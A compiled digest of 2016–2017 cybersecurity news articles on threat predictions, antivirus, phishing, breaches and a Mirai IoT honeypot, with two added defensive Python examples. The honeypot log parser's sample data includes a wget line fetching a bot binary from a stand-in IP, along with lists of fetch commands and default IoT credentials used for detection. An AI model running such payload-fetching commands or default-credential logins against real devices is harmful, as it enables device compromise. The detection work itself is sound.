If 2016 was the year hacking went mainstream, 2017 will be the year hackers innovate, said Adam Meyer, chief security strategist at SurfWatch Labs. Meyer analyzes large and diverse piles of data to help companies identify emerging cyber-threat trends. "2017 will be the year of increasingly creative [hacks]," he said. In the past, cybersecurity was considered the realm of IT departments, Meyer explained, but no longer. As smart companies systematically integrate security into their systems, hacker culture, too, will evolve.

"Cybercriminals follow the money trail," Meyer said, and smart companies should adopt proactive policies. Ransomware attacks grew quickly, he said, because the attacks are "cheap to operate, and many organizations are not yet applying the proper analysis and decision-making to appropriately defend against this threat."


It's equally cheap to identify internal vulnerability to hacks and to apply preventative best practices, Meyer said. But for many companies it's not as easy to understand the cybersecurity threats most likely to impact business. To help, TechRepublic spoke with a number of prominent security experts about their predictions for near-future cybersecurity trends likely to impact enterprise and small business in 2017.

Cyber-offense and cyber-defense capacities will increase - Mark Testoni, CEO at SAP's national security arm, NS2

We will see an increased rate of sharing of cyber capabilities between the commercial and government spaces. Commercial threat intelligence capabilities will be adopted more broadly by organizations and corporations... High performance computing (HPC), in conjunction with adaptive machine learning (ML) capabilities, will be an essential part of network flow processing because forensic analysis can't stop an impending attack. HPC + adaptive ML capabilities will be required to implement real-time network event forecasting based on prior network behavior and current network operations... [Companies will] use HPC and adaptive ML to implement real-time behavior and pattern analysis to evaluate all network activity based on individual user roles and responsibilities to identify potential individuals within an organization that exhibit "out of the ordinary" tendencies with respect to their use of corporate data and application access.

Ransomware and extortion will increase - Stephen Gates, chief research intelligence analyst at NSFOCUS

The days of single-target ransomware will soon be a thing of the past. Next-generation ransomware paints a pretty dark picture as the self-propagating worms of the past, such as Conficker, Nimda, and Code Red, will return to prominence—but this time they will carry ransomware payloads capable of infecting hundreds of machines in an incredibly short timespan. We have already seen this start to come to fruition with the recent attack on the San Francisco Municipal Transport Agency, where over 2,000 systems were completely locked with ransomware and likely spread on its own as a self-propagating worm. As cybercriminals become more adept at carrying out these tactics, there is a good chance that these attacks will become more common.

Industrial IoT hacks will increase - Adam Meyer, chief security strategist at SurfWatch Labs

As more devices become internet-enabled and accessible and the security measures in place continue to lag behind, the associated risks are on the rise. Aside from the obvious risks for attacks on consumer IoT devices, there is a growing threat against industrial and municipal IoT as well. As leading manufacturers and grid power producers transition to Industry 4.0, sufficient safeguards are lacking. Not only do these IoT devices run the risk of being used to attack others, but their vulnerabilities leave them open to being used against the industrial organizations operating critical infrastructure themselves. This can lead to theft of intellectual property, collecting competitive intelligence, and even the disruption or destruction of critical infrastructure. Not only is the potential scale of these attacks larger, most of these industrial firms do not have the skills in place to deal with web attacks in real-time, which can cause long-lasting, damaging results. This alone will become one of the greatest threats that countries and corporations need to brace themselves for in 2017 and beyond.

Internal threats will increase - James Maude, senior security engineer at Avecto

As organizations adopt more effective strategies to defeat malware, attackers will shift their approach and start to use legitimate credentials and software - think physical insiders, credential theft, man-in-the-app. The increased targeting of social media and personal email bypasses many network defenses, like email scans and URL filters. The most dangerous aspect is how attackers manipulate victims with offers or threats that they would not want to present to an employer, like employment offers or illicit content. Defenders will begin to appreciate that inconsistent user behaviors are the most effective way to differentiate malware and insider threats from safe and acceptable content.


A big part of the challenge with cyberattacks is how businesses think threats can be filtered at the perimeter. Be warned that this is not the case. Attackers are aware of how to directly target users and endpoints using social engineering. The industry needs to be more proactive in thinking about how to reduce the attack surface, as opposed to chasing known threats and detecting millions of unknown threats. With an increasingly mobile workforce and threats coming through both personal and business devices and services, the impact of perimeter defenses has decreased. Security needs to be built from the endpoint outwards.

Business security spending will increase - Ed Solis, Director of Strategy & Business Development at CommScope

Security is part of every business and IT discussion these days and it will only become more intense in 2017. We see an increase in the demand for video for surveillance, both for government and private businesses. This issue includes physical security—securing the building, people, and assets—as well as network and data security... In 2017, security conversations will continue to intensify around not only securing data and networks but physical security as well: think buildings, people, and assets. We also expect to see an increased demand for video surveillance across the public sector and private business.


Security will no longer be an afterthought - Signal Sciences' Co-Founder & Chief Security Officer, Zane Lackey

2017 will be a critical year for security, starting with how it's built into technology. DevOps and security will change the way they work together as they realize the need to integrate with each other in order to survive. With IoT on the rise, security will continue to be the primary obstacle preventing consumers from fully welcoming connected devices into their homes and lifestyles. Consumers and businesses are getting smarter and security vendors will be held more accountable in keeping them safe.



When Antivirus Fails, What to Choose to Help

From: Securitybrief NZ by: Kane Lightowler

The ineffectiveness of traditional antivirus (AV), which catches less than half of noteworthy malicious events, is causing untold damage to organisations worldwide. The harm is unnecessary, as next-generation antivirus (NGAV), the natural evolution of AV, will protect computers from the full spectrum of modern cyber attacks.

So let us re-think endpoint defences and provide a checklist of items to consider while making the decision to transition to NGAV.

Traditional antivirus was designed and built before the cybercrime explosion, and the speed at which tools and techniques are now changing. Modern attacks often utilise techniques that leverage built-in tools and scripts, much different from the days where attacks were almost always malicious binaries.

Beyond considering the kinds of attacks, organisations need the ability to protect themselves quickly rather than waiting for their vendor to push out signatures, hoping that the endpoints receive an update before that malicious email lands in employees’ inboxes.

To reduce cyber risk, IT needs an endpoint-security approach that goes beyond malware and incorporates next-generation features that target the tactics, techniques and procedures frequently used by both mass scale opportunistic attackers and advanced threats specifically targeting an organisation.

The following checklist will help IT to assess the capabilities of a current antivirus solution and provide guidance for migrating to a more mature posture. While an organisation might have unique requirements or constraints, the list will ease their shift to next-generation anti-virus.

#1 Full range of protection

Modern attackers generate malware faster than traditional AV stops it. They are mastering techniques that don’t even require malware. An endpoint security solution should protect against all attacks, not just threats that involve running a malicious executable. Beyond the initial execution blocks, there should be strong protection against particularly useful adversarial techniques like thread injection and RAM scraping.

In evaluating an NGAV solution, make sure it protects against:

- Known malware and variants, including malware-based ransomware
- Obfuscated, evasive or previously unknown malware
- Compromised (exploited) legitimate software (Flash, Silverlight, etc.)
- Malicious scripts and interpreted code like PowerShell, Visual Basic, Perl, Python, Java
- Memory-resident and file-less attacks
- Document-based attacks (PDFs and macros)
- Remote login attacks and the malicious use of valid software (living off the land)

#2 Extensible cloud security intelligence and analytics

As attackers evolve and adapt their tactics and techniques, organisations need to employ new analytic capabilities and attack intelligence to properly defend themselves – without having to redeploy security infrastructure. An NGAV should feature:

- A cloud backend for high-powered analysis and the application of vendor intelligence
- Multiple inspection engines that focus on reputation, behaviour, and event relationships
- Configurable detection sensitivities to prioritize important events and reduce unnecessary alerting
- Open and extensible threat feeds for third-party attack intelligence and for leveraging security investments already made
- Community-based intelligence sharing and the network effect of benefiting from attacks other users witness

#3 Visibility and context into attack and detection events

After an attack attempt, IT needs to understand what happened so they can contain and control the situation, prevent further damage and improve the overall security posture. The right context helps to do all that quickly and easily. If each attack doesn’t make for stronger defence, we recommend a reconsideration of IT’s approach. An NGAV solution should provide:

- Insight into how the threat started, even before it was detected (root cause)
- Visibility into where else in the organisation this threat might exist (scope)
- Guidance on what’s needed to recover and how to close gaps (education and maturity)
- Data sharing within the ecosystem (SIEM, etc.) (integration and automation)

#4 Integrated rapid-response

Not every attack can be prevented. Skilled attackers can use stolen credentials and native system tools such as PowerShell to infiltrate a machine without using malware. These attacks can still be detected, and when they are IT needs to be able to respond quickly.

An NGAV solution should make it easy to: delete malware or temporary files across the organisation; stop network activity for a specific process; quarantine a system and isolate it from the network; and blacklist files from executing anywhere in the environment.

#5 Lightweight operations

We have all experienced antivirus grinding our computer to a halt while it scans the drive. Thankfully, those days are gone. Next-generation antivirus should be lightweight on the system and easy to administer so it doesn’t slow users down.

#6 A platform that grows with assets, users, systems and teams

Different assets require different strategies for protection. Servers, for example, don’t change often and have highly restrictive protection policies. Meanwhile, developers need more flexibility. A solution should adapt to the organisation’s needs and be part of a platform that provides a growth path to a better security posture over time.

An NGAV should be part of a platform that provides: group-based policy that applies different security strategies to different systems; an upgrade path to advanced incident response and threat hunting for SOCs and IR teams; an upgrade path to default-deny and lockdown policies for sensitive or high-risk systems; and an upgrade path to app control, device control, and file integrity monitoring for servers and critical systems.



How an analyst targeted a Phisher, and how to respond to Ransomware

From: CSO online by: Ryan Francis

Like any other threat analyst, Marc Laliberte has an email inbox that fills up minute by minute, and some of that mail makes its way past the spam filter. The WatchGuard employee decided to finally act upon a certain phishing attempt in hopes of teaching the bad guys a lesson.

Spear phishing is a type of phishing attack in which the perpetrator customizes their attack to a particular individual or group of individuals. The attacker gathers information on the victim and then tailors the attack to be more likely to fool the target. The would-be attack arrived as an email appearing to come from the finance employee’s manager, requesting an urgent wire transfer.

Thanks to proper security awareness training, the finance employee recognized that the email’s blatant disregard for the official chain of command and finance protocols was suspicious and alerted the proper personnel.

In most cases, companies don't have the time or resources to follow the bread crumbs back to the perpetrator. But in this case Laliberte set out to learn as much as he could by playing along with the attacker. He responded to the first email and the attacker replied, asking “the finance employee” to contact them via text to a phone number the attacker claimed was the manager’s personal line.

The email’s source address was a seemingly random seven-digit number at The attacker didn’t try to spoof the message to make it appear to come from a WatchGuard account. Instead, the attacker relied on the message’s “From:” header to fool the target. Most mail clients use the “From:” header to display who a message came from, and often the client only shows a sender’s first and last name. In this phishing email, the “From:” header showed the WatchGuard manager’s first and last name, which might convince uninformed employees that the message really did come from that manager.
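As an added illustration of the display-name trick described above (example code written for this digest, not the article's or WatchGuard's), the following Python check flags an inbound message whose "From:" display name matches a known employee while the actual address sits outside the organisation's domain. The employee directory, the example.com domain and the sample messages are all constructed.

```python
"""Detect display-name impersonation in inbound mail headers.

Added example, not code from the article. A mail client typically shows only
the "From:" display name, so a message can carry a manager's name while the
real sender address belongs to an outside provider. The check below compares
the display name against a directory of known employees and reports a mismatch.
"""
import re
from email import policy
from email.parser import Parser

INTERNAL_DOMAIN = "example.com"  # assumed organisation domain (constructed)

# Constructed directory: normalised display name -> the employee's real address.
KNOWN_EMPLOYEES = {
    "jane manager": "jane.manager@example.com",
    "sam cfo": "sam.cfo@example.com",
}


def normalise_name(name: str) -> str:
    """Lower-case, drop punctuation and collapse whitespace for directory lookup."""
    return " ".join(re.sub(r"[^\w\s]", " ", name).lower().split())


def check_from_header(raw_message: str) -> list[str]:
    """Return a list of findings for one RFC 822 message; empty means nothing suspicious."""
    msg = Parser(policy=policy.default).parsestr(raw_message)
    findings: list[str] = []

    from_hdr = msg["From"]
    if from_hdr is None or not from_hdr.addresses:
        return ["missing or unparseable From header"]
    sender = from_hdr.addresses[0]
    display = normalise_name(sender.display_name)
    addr = sender.addr_spec.lower()
    domain = sender.domain.lower()

    # Core check: a known employee's name paired with a different sending address.
    expected = KNOWN_EMPLOYEES.get(display)
    if expected and addr != expected:
        findings.append(
            f"display name '{sender.display_name}' matches employee {expected} "
            f"but the message was sent from {addr}"
        )

    # The phish in the article used a numeric mailbox at an outside provider;
    # an all-digit local part from an external domain is worth a look.
    if domain != INTERNAL_DOMAIN and sender.username.isdigit():
        findings.append(f"numeric mailbox name at external domain: {addr}")

    # Companion check (not from the article): replies steered to another domain.
    reply_to = msg["Reply-To"]
    if reply_to is not None and reply_to.addresses:
        reply_domain = reply_to.addresses[0].domain.lower()
        if reply_domain != domain:
            findings.append(
                f"Reply-To domain {reply_domain} differs from From domain {domain}"
            )
    return findings


# Constructed sample messages.
SPOOFED = (
    "From: Jane Manager <1234567@mail.example.net>\n"
    "To: finance@example.com\n"
    "Subject: Urgent wire transfer\n"
    "\n"
    "Please send the wire today and text me on my personal line.\n"
)
LEGIT = (
    "From: Jane Manager <jane.manager@example.com>\n"
    "To: finance@example.com\n"
    "Subject: Q1 budget\n"
    "\n"
    "Attached.\n"
)
REDIRECTED = (
    "From: Sam CFO <sam.cfo@example.com>\n"
    "Reply-To: Sam CFO <accounts@mail.example.net>\n"
    "To: finance@example.com\n"
    "Subject: Invoice\n"
    "\n"
    "See below.\n"
)

if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED), ("legit", LEGIT), ("redirected", REDIRECTED)):
        print(label, "->", check_from_header(sample) or "no findings")
```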

Laliberte did some digging and found that the phone number provided by the attacker was registered as a landline through Level 3 Communications with an area code matching Jacksonville, Fla. He suspected that the attacker was probably never physically located in Jacksonville; instead, he likely used a forwarding service to send and receive text messages through this number. Attackers commonly leverage the global nature of internet and telephony services to hide the true location of their attacks.

Laliberte texted the attacker using a disposable phone number. A day later, the attacker replied and quickly got to the point, requesting an urgent fund transfer as payment for a shipment of WatchGuard Fireboxes arriving the following week. He kept the attacker on the hook by alluding that a money transfer was possible and asked for further details.

The attacker asked for a wire transfer of $20,000 to a man he claimed was in New York. Some quick research revealed that there were no fraud references related to the provided name. The attacker also sent account and routing numbers for the wire transfer itself. While providing bank account details adds legitimacy to transactions, it also increases the authorities’ ability to track payments in fraud investigations, making it risky for attackers to do. It appeared that the account details provided likely belonged to a compromised account that the attacker could quickly transfer money out of.

At this point, Laliberte had gathered all of the information the attacker would voluntarily share, but still had no clear picture of where he was located. However, the attacker did expect a wire transfer confirmation message. He masked the IP address (as seen below) of a honeypot server behind a URL-shortener and sent it to the attacker disguised as a confirmation link.

* - - [22/Apr/2016:22:25:06 +0000] "GET /verify HTTP/1.1" 404 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1"

When the attacker visited the link, it redirected him to the honeypot server where Laliberte logged his source IP and browser User-Agent data. The attacker’s source IP was registered to Airtel Networks Limited, a mobile Telco out of Nigeria. The User-Agent data told Laliberte that the attacker was connected to the honeypot using an iPhone running iOS 9.3.1. This confirmed the hypothesis that the attacker was using a forwarding service to receive text messages through the Jacksonville phone number.

Though the attacker was in Nigeria, he used a bank account (TD Bank) that required a permanent US address, meaning the account was either compromised or the attacker had an accomplice in the US (often called a mule) who could retrieve any transferred money. Laliberte contacted TD Bank to allow them to begin an investigation on attempted fraud by someone with access to the provided account.

This spear phishing attempt makes it clear just how big of a problem these attacks are today. No spear phishing protection is perfect. Even with technological solutions like DMARC or S/MIME, phishing messages will still slip through and reach employees, he said. It is critical that IT professionals train their users on how to spot and report attempted phishing attacks. With the growth of spear phishing, organizations need to update their training programs to help employees learn how to spot these more convincing, targeted email scams.



Corporations Cite Reputational Damage as Biggest Cyber Risk

From: Dark Reading by: Kelly Sheridan

New data analyzing SEC disclosures found 83% of publicly traded companies worry most about the risk of brand damage via hacks exposing customer or employee information.

Public businesses fear the possibility of losing customers' or employees' personally identifiable information (PII) and the subsequent brand-damage fallout more so than other risks, a new study published by the International Association of Privacy Professionals (IAPP) found.

The IAPP Westin Research Center studied US Securities and Exchange Commission (SEC) Form 10-K disclosure statements from more than 100 publicly traded companies. The forms are where businesses share risk factors that could prove concerning to investors.

The chief privacy officers, chief legal counsel, and other experts in privacy and privacy law on IAPP's research advisory board were struggling to quantify privacy risk for their companies and clients. IAPP decided to study this via the SEC disclosures, according to IAPP research director Rita Heimes.

"It's tough to come up with a value for privacy risk," she explains. "We decided to determine whether companies think [privacy] is a risk to the bottom line, and provide more definition that way."

Among the companies that disclosed privacy risk, 83% cited reputational harm as the top digital risk factor. This surpassed civil litigation (60%), regulatory enforcement (51%), and remediation (50%). Less than half (43%) cited the risk of failing to comply with privacy laws and regulations.

Brand damage causes more immediate harm than lawsuits, which can drag on for long periods of time.

"Trust is the biggest threat because it applies to both the employee and the customer, depending on whose data is being misused or exposed," Heimes says. "Once that trust factor is undermined, it can have a ripple effect, leading to financial harm, embarrassment, or drop in employee retention."

Another risk factor is the loss of corporate resources, Heimes continues. Any time someone mishandles personal data, it takes a lot of time away from business operations, because employees have to work on planning recovery and preventing future incidents.

One in five companies warns investors that if it becomes the victim of a data breach, the liability could exceed its insurance coverage. The same proportion say an attack could distract management and other employees from their core business responsibilities.

The fear of privacy risk varies across industries, says Heimes. Businesses offering products known for being secure, like software, operating systems or cloud services, run a tremendous risk if personal information is lost.

"If their products are vulnerable to attack and data can be easily mishandled, that makes the product or service inherently less valuable," she explains. "We perceived technology companies and social media platforms as being far more likely to write elaborate, sophisticated, and knowledgeable privacy disclosures" compared with organizations like energy companies, which are more concerned with system failure.

Heimes says she was surprised there wasn't greater unease about the role of vendors and other third parties in using PII. Less than half (47%) of respondents were concerned about information mishandling by business partners, vendors, and other organizations.

"There was less mention of third parties disclosing data than I think is reflective of reality," she notes. "This is significant and many companies have begun to step up paying attention to how vendors handle their data."

That is likely to change over time, however, she notes.

There are steps businesses can take to mitigate the risk of information loss, she says. It's not enough to simply buy software tools; the human factor is most important.

Investing in people and helping them understand privacy best practices can prevent the misuse of PII. The workers who collect, store, and make decisions about how to handle user data need to be aware of privacy issues and make informed choices, Heimes says.



323k Malware Files Are Detected Daily

Ever wonder how much malware is detected daily? In 2016, that number was 323,000, as detected by Kaspersky Lab.

This is an increase of 13,000 from the amount in 2015, and a significant jump from the 70,000 files per day identified in 2011.

“We determined this year’s malware growth was mostly caused by a huge increase in the number of downloaders distributed via email,” said Vyacheslav Zakorzhevsky, head of the anti-malware team at Kaspersky Lab. “In most cases these downloaders deliver ransomware on the attacked machines. In 2016, the number of these malicious programs was 3.6 times bigger than in 2015—the result of a cybercriminal’s efforts to hide malware from detection by security solutions. In addition, our constantly improving machine-learning technologies allow us to detect and discover even unknown threats.”

Woburn, MA – December 6, 2016 – According to Kaspersky Lab, the number of new malware files detected by its products in 2016 increased to 323,000 per day. This is an increase of 13,000 from the amount in 2015, and a significant jump from the 70,000 files per day identified in 2011.

The Kaspersky Lab cloud malware database includes discoveries by Astraea, a machine-learning-based malware analysis system running inside the Kaspersky Lab infrastructure. Over a fifth of the malicious objects included in the cloud database were discovered and identified as malicious by Astraea. The database now carries a billion malicious objects, including viruses, Trojans, backdoors, ransomware and advertisement applications and their components.

The percentage of malware discovered and added automatically to the Kaspersky Lab cloud database by Astraea has been growing steadily over the last five years: from 7.53 percent in 2012 to 40.5 percent in December 2016. The proportion is growing in line with the number of new malicious files discovered daily by Kaspersky Lab experts and detection systems, which has increased from 70,000 files per day in 2011 to 323,000 per day in 2016.

“One billion unique malicious files is a remarkable milestone. It shows the scale of the cyber-criminal underground, which has developed from several small forums offering customized malicious tools, to the mass production of malware and tailored cyber-criminal services,” said Zakorzhevsky. “It also highlights the quality and evolution of our automated malware analysis technologies. Out of these billion files, more than 200 million have been added by the Astraea machine-learning system. Our advanced systems now not only detect the vast majority of known malware we get on a daily basis, but also discover unknown threats. Although the remaining 800 million files have been added by other internal detection systems, or by experts, the contribution to the Kaspersky Lab cloud database by machine-learning systems is substantial and will continue to grow.”



3 Cybersecurity Hurdles to overcome in 2017

From: SC Mag by: Ben Johnson

Every month, cyber attacks seem to whiplash back to center stage. There are dozens of headlines at any given moment that should be catalysts for cybersecurity change. But things do not change and, in fact, they may be getting worse. Let's look at the top three negative forces making security harder going into 2017.

The Talent Deficit

Whether you think there aren't enough people to fill the open information-security jobs, or you don't think there are enough already qualified candidates, we're in the midst of cyber battles and today's ranks of capable soldiers are thin.

We need more talent, more hungry professionals who want “to fight the bad guys.” And it's not that this is AN issue, but it is THE issue. Security is still a human problem and will be for the foreseeable future. Without enough security teammates, what chance do we have?

Deploy and Decay

Most teams are not lacking for technology. Intrusion detection, anti-virus, SIEM, detonation; you get the point. What's discouraging, though, is the amount of time and money spent on obtaining a new product or platform, and then seeing that new purchase either sit on the shelf or get deployed and decay over time. From the time products are purchased, they seem to diminish in value. While there are instances where teams are truly leveraging technology to improve their defenses, the vast majority of teams are getting nowhere near the value from their tech stack that they believed they would during demos. Why is this the case?

The first reason is awareness. In my discussions, security teams don't seem to recognize the deploy-and-decay problem until it is really a big problem. It's like ignoring your health until you're in dire pain, or ignoring your teeth until your tooth falls out and then saying maybe you should brush.

The talent deficit contributes to this because there aren't enough available human hours to go back and provide that care and feeding to the tech stack. And the technologies themselves are not "self-healing" or "auto-tuning" to a level that would relieve human cyber defenders of this task.

Lack of Cyber Self-Esteem

Why is there a lack of cyber self-esteem? Environments are complex; culture is often more about clicking links than reporting them; CISOs have to fight for budget; and security controls get bypassed as soon as they have the perception of slowing down productivity. And, as was just mentioned, there aren't enough people and the security stack has cavities. Sounds fun, doesn't it?

It's depressing when I see teams that don't have confidence in leadership, or leadership that doesn't have confidence in the team. While I sincerely empathize, it's frustrating because I know these teams and these individuals are capable of so much more.

Is there Cyber Hope?

Teams are doing a lot of great things. Automation is empowering teams to be more effective. Creative-types and engineers are moving parts of the industry forward. There's a lot to celebrate. So what should you focus on?

  1. Train and retain
  2. Recruit
  3. Optimize your use of tools (and tune them)
  4. Celebrate quick or easy wins and iterate

You must make sure your team is capable and then make sure they stay. Plain and simple. I've said it before, but make items like threat hunting or tech tuning perks, and find other ways to make it fun. Teach your team Python and let them learn other new skills. Security has so much room for creativity and innovation; let your team capture that.

Beyond your existing team, you need a pipeline of candidates. We're in the unfortunate state where security programs should be continually recruiting, continually trying to build their talent pipeline. It's hard enough to find and hire someone, and you will most likely never have more rockstars than positions. So get out there and recruit. In line with making sure your team is happy and trying to fill the ranks, part of making them happy will be optimizing their use of tech. Focus on fewer tools and really make sure closer to 100% of the potential value is being realized. Dive deep into rule creation or API usage. Leverage data sets in different ways. You'll find you don't need as many tools if you do it right.

Finally, you need to celebrate, both internally to the security team and throughout your company when there's a win. Celebrate that employee who reported a phishing attack. Let your team blog or disclose some neat piece of ransomware they found and dissected. Through sharing and other means your team can build up their own brands and make friends in the process. But the best part will be the celebration of these different accomplishments, like reducing mean-time-to-detect or mean-time-to-respond. Security can be really fun and you should aim for that.

If you start taking some of these steps, even an inch at a time, you have a chance at moving your program forward. You may have to fight for that inch, but it moves you forward nonetheless. We cannot give up, we cannot let our technology operate at only 10 percent of its possible value, and we cannot let our teams think they have no chance. Our cyber resiliency will only exist if we start reducing these counter-productive forces on security. Let's make 2017 a better year than 2016, and we can start by overcoming these security hurdles.



Getting Serious about IoT Security

From: Dark Reading by: Troy Dearing

The Department of Homeland Security is fully justified in urging security standards for the Internet of Things. In an effort to curtail a new and disturbing cyberattack trend, the Department of Homeland Security has placed Internet of Things (IoT) device manufacturers on notice. The recent proclamation clarified how serious the agency is about the issue and how serious it wants corporate decision makers to be. In short, the DHS "Strategic Principles for Securing the Internet of Things" acknowledges the gravity of the current climate and the potential for greater harm by encouraging security to be implemented during the design phase, complete with ongoing updates based on industry best practices.

How this effort could affect upcoming product releases is yet to be seen, but these questions remain: How secure must products be before delivery to consumers? Will the liability of insecure Web devices translate to a burden for consumers unaware of proper security? This uncertainty could cause problems for those who produce or use IoT devices.

This move by the DHS was necessary. The recent Dyn DDoS attack made the susceptibility of these devices clear, and the sheer destructive potential makes the risks impossible to ignore.

An IoT Experiment

To determine the severity of the problem, I wanted to see how quickly an IoT device would be attacked once it was connected to the Internet. Would a user who bought an IoT webcam or printer have enough time to set up and securely configure the device before an attacker would compromise the device?

To help me answer this question, I had a couple of choices; I could purchase an insecure IoT device and monitor the activity targeting it, or I could configure a virtual device that would appear to an attacker to be a vulnerable IoT device fresh out of the box. This technique of luring attackers to monitor their efforts and techniques is known as a honeypot. Researchers have been using honeypots for years to study the way attackers gain access to a vulnerable device, as well as what they do after the exploit. I opted for the honeypot route, but it had to be set up just right.

The vast majority of the devices targeted by Mirai are running a stripped-down version of the Linux operating system, developed for multiple architectures (MIPS, ARM, x86, etc.). These machines generally run a tool called BusyBox — "The Swiss Army knife of embedded Linux," as developers refer to it. This single binary allows for the execution of more than 300 commands, cutting down on the space required of an operating system on an embedded device. Space isn't an issue for a honeypot, but it was important to have executables that are used by the code we saw when Mirai was made public.

I opted for a Debian Linux distribution, with BusyBox available just in case. I configured the honeypot to have the same ports open that these devices generally have — 23 and 80. After the configuration was complete, including setting up the same credentials seen in the recent attacks, it was time to find out how long people would have to secure a new IoT device that was connected to the Internet.

It turns out they wouldn't have much time at all. In less than 10 minutes, the honeypot was hit with 13 brute force attacks. After an hour of being online, it had been attacked 551 times, with more than 10 unique attackers having interacted with the honeypot. I continued to monitor all activity for the rest of the week. When I finally shut down the honeypot, it had been subjected to 2,665 brute force attacks and more than 108 sessions where there was an attempt to gain access. Some of those sessions resulted in malware being downloaded.
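The figures in the experiment above (attempts in the first minutes, unique attackers, sessions that got in, sessions that fetched a payload) are the kind of summary a defender pulls out of a honeypot's authentication log. The following is an added example, not Dearing's honeypot or its real output: it assumes a simple one-event-per-line log format and uses constructed sample lines, and it counts attempts that used the factory credentials the article names (admin/root with admin/password).

```python
"""Summarise authentication activity captured by a Telnet honeypot.

Added example: it assumes a simple one-event-per-line log format and uses
constructed sample lines; it is not the article's honeypot or its real output.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample log (not real captures). Assumed line format:
#   <UTC timestamp> <source IP> <session id> LOGIN <user>/<password> <OK|FAIL>
#   <UTC timestamp> <source IP> <session id> CMD <command line>
SAMPLE_LOG = """\
2016-10-05T09:00:00Z 203.0.113.5 s1 LOGIN root/admin FAIL
2016-10-05T09:00:02Z 203.0.113.5 s1 LOGIN admin/admin OK
2016-10-05T09:00:40Z 198.51.100.7 s2 LOGIN root/password FAIL
2016-10-05T09:00:41Z 198.51.100.7 s2 LOGIN root/12345 FAIL
2016-10-05T09:03:10Z 192.0.2.9 s3 LOGIN admin/password OK
2016-10-05T09:03:15Z 192.0.2.9 s3 CMD wget http://203.0.113.77/bot.mips
2016-10-05T09:07:59Z 203.0.113.5 s4 LOGIN admin/1234 FAIL
"""

# Factory credentials the article says were still in place on compromised devices
DEFAULT_CREDS = {("admin", "admin"), ("admin", "password"),
                 ("root", "admin"), ("root", "password")}

# Commands that fetch a payload onto the device (assumed list for this example)
FETCH_COMMANDS = ("wget", "tftp", "curl")

TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


@dataclass
class Event:
    ts: datetime
    ip: str
    session: str
    kind: str                      # "LOGIN" or "CMD"
    user: Optional[str] = None
    password: Optional[str] = None
    ok: Optional[bool] = None      # login result
    detail: str = ""               # command text for CMD events


def parse_line(line: str) -> Optional[Event]:
    """Parse one log line; return None for blank or malformed lines."""
    parts = line.split(maxsplit=4)
    if len(parts) < 5:
        return None
    ts_text, ip, session, kind, rest = parts
    ts = datetime.strptime(ts_text, TS_FORMAT)
    if kind == "LOGIN":
        creds, _, result = rest.rpartition(" ")
        user, _, password = creds.partition("/")
        return Event(ts, ip, session, kind, user, password, result == "OK")
    if kind == "CMD":
        return Event(ts, ip, session, kind, detail=rest)
    return None


def parse_log(text: str) -> List[Event]:
    events = [parse_line(line) for line in text.splitlines()]
    return [e for e in events if e is not None]


def summarize(events: List[Event], online_since: datetime) -> Dict[str, object]:
    """Reduce events to the figures a honeypot write-up reports."""
    logins = [e for e in events if e.kind == "LOGIN"]
    succeeded = {e.session for e in logins if e.ok}
    fetched = {e.session for e in events
               if e.kind == "CMD" and e.detail.split()[0] in FETCH_COMMANDS}
    first = min((e.ts for e in logins), default=None)
    return {
        "login_attempts": len(logins),
        "unique_attackers": len({e.ip for e in logins}),
        "sessions": len({e.session for e in events}),
        "successful_sessions": len(succeeded),
        "default_cred_attempts": sum((e.user, e.password) in DEFAULT_CREDS for e in logins),
        "download_sessions": len(fetched & succeeded),   # got in AND fetched a payload
        "seconds_to_first_attempt": (None if first is None
                                     else int((first - online_since).total_seconds())),
        "top_sources": Counter(e.ip for e in logins).most_common(3),
    }


def summarize_text(text: str, online_since: str) -> Dict[str, object]:
    """Convenience wrapper: online_since is an ISO timestamp in the log's format."""
    return summarize(parse_log(text), datetime.strptime(online_since, TS_FORMAT))


if __name__ == "__main__":
    # Constructed go-live time: 30 seconds before the first recorded attempt
    for key, value in summarize_text(SAMPLE_LOG, "2016-10-05T08:59:30Z").items():
        print(f"{key}: {value}")
```

The point of `download_sessions` counting only sessions that both authenticated and ran a fetch command is the same one the article makes about follow-on attacks: the login flood is noise, and the sessions worth analysing are the few that got in and pulled something down.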

The Evolution of Mirai

The analysis of the malware wasn't what I expected. I was hoping to see the Mirai source code, but it was new code based on Mirai. It had only been a few days from the release of the source code and someone already had repurposed it and made minor tweaks — and here it was sitting on my IoT honeypot. This was a reminder that we shouldn't focus on a single signature when looking for follow-on attacks; if I had only looked for binaries that should have been downloaded by Mirai, I could have missed these new threats.

Based on my experiment, it's obvious that the DHS directive was needed. More must be done by device manufacturers to provide a modicum of security before release.

What Users Can Do

Fortunately, there are ways to ensure that network devices stay under user control:

  1. Change default passwords. The devices compromised by Mirai had default credentials still in place, many of which consisted of the username "admin" or "root" and the password "admin" or "password." Users should ensure that any device deployed to their network has the default password changed.
  2. Disable remote administration. By default, many devices allow for remote administration from outside the internal network. Administrative tasks should be performed internally if possible.
  3. Keep firmware up to date. Because of the recent attacks, manufacturers are expected to release firmware updates to products to close down security holes, preventing subsequent attacks. By default, these devices require user interaction to apply these firmware patches. Make sure that before installing the latest firmware you back up the current working firmware and have it locally in case the update fails, so you aren't left with a broken device.



85 Million Accounts exposed on Dailymotion

From: by: Steve Ragan

Breach notification service LeakedSource announced on Monday that it has obtained 85.2 million records from Dailymotion, one of the largest video platforms on the Web. The compromised data consists of email addresses, usernames, and some passwords.

ZDNet confirmed that the data did come from the entertainment website, but representatives for Vivendi, the Paris-based majority owner of Dailymotion, did not respond to requests for comment.

LeakedSource says that the data was possibly compromised on October 20, meaning it is possible criminals have been circulating the data for some time. It wasn’t clear when LeakedSource obtained the records.

While the email addresses and usernames are clearly visible in sample records seen by Salted Hash, only some of them have visible passwords (just over 18 million). Because Dailymotion used bcrypt to hash the passwords, cracking them will be more difficult than passwords that are hashed with SHA1 or MD5.

Such protection measures are a good thing, and help lower the impact of a data breach, but cracking bcrypt hashes isn’t impossible depending on the circumstances, as proven during the Ashley Madison incident. What bcrypt does is make the cracking process extremely slow, while requiring serious CPU power.
